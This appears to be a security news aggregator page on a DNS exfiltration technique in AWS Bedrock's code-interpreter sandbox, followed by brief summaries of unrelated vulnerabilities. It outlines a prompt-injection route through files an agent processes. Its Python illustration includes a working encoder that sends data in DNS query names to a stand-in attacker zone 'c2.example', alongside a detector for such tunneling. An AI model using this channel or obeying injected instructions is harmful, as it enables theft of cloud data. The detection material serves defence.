

DNS Exfiltration in AWS Bedrock Code Interpreter

2 unique sources, 2 articles

Summary


BeyondTrust researchers demonstrated a DNS-based data exfiltration method in the sandbox mode of AWS Bedrock AgentCore Code Interpreter. Sandbox mode restricts outbound network access, but DNS queries still leave the sandbox, so an attacker who gets code running there can turn query names and responses into a bidirectional command-and-control channel, obtain an interactive reverse shell, and exfiltrate sensitive data. The malicious instructions reach the interpreter embedded in files the agent processes; exfiltrating AWS resources such as S3 bucket contents additionally requires the interpreter's IAM role to be overly permissive. AWS confirmed the behavior is intended functionality and updated its documentation to recommend VPC mode rather than sandbox mode for sensitive workloads. BeyondTrust assigned the issue a CVSS score of 7.5. The findings highlight the architectural limits of sandbox isolation and the risk of overprivileged IAM roles in AI code execution environments.

Timeline

  1. 16.03.2026 15:00 · 2 articles

    DNS Exfiltration Technique Demonstrated in AWS Bedrock Code Interpreter

    BeyondTrust disclosed a DNS-based data exfiltration method in the sandbox mode of AWS Bedrock AgentCore Code Interpreter and assigned it a CVSS score of 7.5. Because DNS resolution remains available under the sandbox's network restrictions, the technique lets attackers establish a bidirectional channel over DNS queries and responses, obtain an interactive reverse shell, and exfiltrate sensitive information; reaching AWS resources such as S3 buckets depends on what the associated IAM role is permitted to access. AWS confirmed the behavior as intended functionality and updated its documentation to recommend migrating to VPC mode for sensitive workloads.

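The summary and timeline above describe the mechanics only in outline: data is carried out in DNS query names because name resolution still works under the sandbox's network restrictions. The following Python is an added illustration, not code from BeyondTrust's research or from AWS. It shows both ends of such a channel (the sender packs a payload into query names; the receiver, the attacker's authoritative server for the zone, reassembles it) and a heuristic detector run over a constructed list of query names. The zone `c2.example`, the label sizes, the detection thresholds, `SAMPLE_QUERIES` and `SAMPLE_SECRET` are all assumptions made for the example.

```python
import base64
import math
from collections import defaultdict

# Hypothetical attacker-controlled zone (reserved example TLD); the disclosure
# summarised above does not name one.
ATTACKER_DOMAIN = "c2.example"
LABEL_LEN = 48          # stays under the 63-octet label limit of RFC 1035
LABELS_PER_QUERY = 3    # 3 * 48 base32 chars = 90 payload bytes per query

# Constructed sample data: benign-looking queries and a fake "secret".
SAMPLE_QUERIES = [
    "s3.us-east-1.amazonaws.com",
    "bedrock-agentcore.us-east-1.amazonaws.com",
    "pypi.org",
    "files.pythonhosted.org",
]
SAMPLE_SECRET = (
    b"CONSTRUCTED-NOT-REAL bucket=prod-customer-exports "
    b"object=2026-03/report.csv rows=15320 "
    b"note=this string exists only to give the encoder something to carry"
)


def encode_exfil(data: bytes, domain: str = ATTACKER_DOMAIN) -> list[str]:
    """Sender side (inside the sandbox): pack `data` into names of the form
    <seq>.<label>.<label>.<label>.<domain>. Base32 rather than base64 because
    DNS names are case-insensitive and a resolver may fold case; the hex
    sequence label lets the receiver reorder out-of-order or retried queries."""
    b32 = base64.b32encode(data).decode("ascii").rstrip("=").lower()
    per_query = LABEL_LEN * LABELS_PER_QUERY
    names = []
    for seq, start in enumerate(range(0, len(b32), per_query)):
        chunk = b32[start:start + per_query]
        labels = [chunk[i:i + LABEL_LEN] for i in range(0, len(chunk), LABEL_LEN)]
        names.append(".".join([f"{seq:04x}", *labels, domain]))
    return names


def decode_exfil(names: list[str], domain: str = ATTACKER_DOMAIN) -> bytes:
    """Receiver side (authoritative server for `domain`): strip the zone,
    order by sequence label, restore base32 padding, decode."""
    suffix = "." + domain
    pieces = {}
    for name in names:
        if not name.endswith(suffix):
            continue
        seq, *labels = name[:-len(suffix)].split(".")
        pieces[int(seq, 16)] = "".join(labels)
    b32 = "".join(pieces[k] for k in sorted(pieces)).upper()
    b32 += "=" * (-len(b32) % 8)          # base32 input must be a multiple of 8
    return base64.b32decode(b32)


def shannon_entropy(s: str) -> float:
    """Bits per character: base32 payload approaches 5, real hostnames sit near 3."""
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def registered_domain(qname: str) -> str:
    """Naive: last two labels. Production code should use the Public Suffix List."""
    return ".".join(qname.rstrip(".").split(".")[-2:])


def flag_tunneling(qnames: list[str], min_unique: int = 8) -> dict[str, list[str]]:
    """Return {qname: [reasons]} for names that look like a DNS data channel:
    oversized labels, high-entropy subdomains, or many distinct names under
    one registered domain (the volume signature no single-query rule sees)."""
    unique_names = defaultdict(set)
    for q in qnames:
        unique_names[registered_domain(q)].add(q)
    flagged = {}
    for q in qnames:
        rd = registered_domain(q)
        sub = q[:-len(rd) - 1] if q.endswith("." + rd) else ""
        labels = sub.split(".") if sub else []
        compact = sub.replace(".", "")
        reasons = []
        if max((len(label) for label in labels), default=0) >= 40:
            reasons.append("label of 40+ chars")
        if len(compact) >= 20 and shannon_entropy(compact) >= 4.0:
            reasons.append("high-entropy subdomain")
        if len(unique_names[rd]) >= min_unique:
            reasons.append(f"{min_unique}+ distinct names under {rd}")
        if reasons:
            flagged[q] = reasons
    return flagged


def demo() -> dict:
    """Encode the fake secret, mix it with benign traffic, run the detector."""
    names = encode_exfil(SAMPLE_SECRET)
    log = SAMPLE_QUERIES + names + SAMPLE_QUERIES   # benign noise on both sides
    return {"names": names, "flagged": flag_tunneling(log),
            "roundtrip": decode_exfil(names)}


if __name__ == "__main__":
    result = demo()
    print(f"{len(result['names'])} queries carry {len(SAMPLE_SECRET)} bytes")
    for qname, reasons in result["flagged"].items():
        print("FLAG", qname[:50] + "...", reasons)
```

Two practical caveats. The volume rule (`min_unique`) is the one that survives an attacker who shortens labels to dodge the length and entropy checks, but it needs more queries than this small sample produces, so tune it on your own baseline. And every rule presumes you can see the resolver traffic at all, which is the practical argument behind the VPC-mode recommendation above: in your own VPC you can log and restrict outbound DNS (for example with Route 53 Resolver query logging and DNS Firewall), whereas the managed sandbox presumably gives you no such vantage point.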


Similar Happenings

Cisco SD-WAN Zero-Day Exploited by Highly Sophisticated Threat Actor

A critical zero-day vulnerability (CVE-2026-20127) in Cisco Catalyst SD-WAN Controller and Manager is being actively exploited by a sophisticated threat actor tracked as UAT-8616. The flaw allows unauthenticated remote attackers to bypass authentication and gain administrative privileges. Exploitation dates back to 2023, and Cisco has credited the Australian Signals Directorate's Australian Cyber Security Centre (ASD-ACSC) for reporting the vulnerability. The vulnerability has a CVSS score of 10.0, the maximum severity. Cisco is tracking the exploitation and the associated post-compromise activity.

Critical Vulnerabilities in Fluent Bit Logging Agent

Critical vulnerabilities in Fluent Bit, a widely used telemetry agent, have been disclosed. These flaws affect log, metric, and trace handling across banking, cloud, and SaaS platforms. The issues include improper input validation, path traversal bugs, and authentication bypasses, allowing attackers to manipulate logs, overwrite files, and execute code. Patches are available in versions v4.1.1 and v4.0.12, but older versions remain at risk. The vulnerabilities could distort observability pipelines, impacting financial services, security products, and SaaS environments. Immediate patching and configuration hardening are recommended. AWS has urged customers to update to the latest version of Fluent Bit for optimal protection. The flaws could enable attackers to disrupt cloud services, manipulate data, and burrow deeper into cloud and Kubernetes infrastructure.

Multiple Critical Vulnerabilities in SolarWinds Web Help Desk

SolarWinds has released security updates to address multiple critical vulnerabilities in SolarWinds Web Help Desk, including CVE-2025-40536, CVE-2025-40537, CVE-2025-40551, CVE-2025-40552, CVE-2025-40553, and CVE-2025-40554. These vulnerabilities could result in authentication bypass and remote code execution (RCE). CVE-2025-40551 is actively exploited in attacks and has been added to CISA's KEV catalog. SolarWinds Web Help Desk is used by more than 300,000 customers worldwide, including government agencies, large corporations, healthcare organizations, and educational institutions. SolarWinds has also released security updates to patch four critical Serv-U remote code execution vulnerabilities that could grant attackers root access to unpatched servers. The most severe flaw, CVE-2025-40538, allows attackers with high privileges to gain root or admin permissions on vulnerable servers. These vulnerabilities include a broken access control flaw, two type confusion flaws, and an Insecure Direct Object Reference (IDOR) vulnerability. All four vulnerabilities require attackers to already have high privileges on the targeted servers.

Critical RADIUS Authentication Flaw in Cisco Secure Firewall Management Center

Cisco has disclosed and patched a critical vulnerability in the RADIUS subsystem of Secure Firewall Management Center (FMC) Software. The flaw, CVE-2025-20265, allows unauthenticated, remote attackers to execute arbitrary shell commands on affected systems. This vulnerability affects FMC Software versions 7.0.7 and 7.7.0 when RADIUS authentication is enabled for web-based management or SSH. Additionally, Cisco has released security updates to patch two maximum-severity vulnerabilities in its Secure Firewall Management Center (FMC) software: an authentication bypass flaw (CVE-2026-20079) that allows attackers to gain root access to the underlying operating system, and a remote code execution (RCE) vulnerability (CVE-2026-20131) that lets attackers execute arbitrary Java code as root on unpatched devices. Cisco's Product Security Incident Response Team (PSIRT) has no evidence that these flaws are exploited in attacks or that proof-of-concept (PoC) exploit code has been published online. In March 2026, Cisco released a bundled publication containing 25 security advisories detailing vulnerabilities in enterprise networking products, including nine high-severity vulnerabilities in the ASA Firewall, Secure FMC, and Secure FTD appliances. Cisco is not aware of any of these vulnerabilities being exploited in the wild.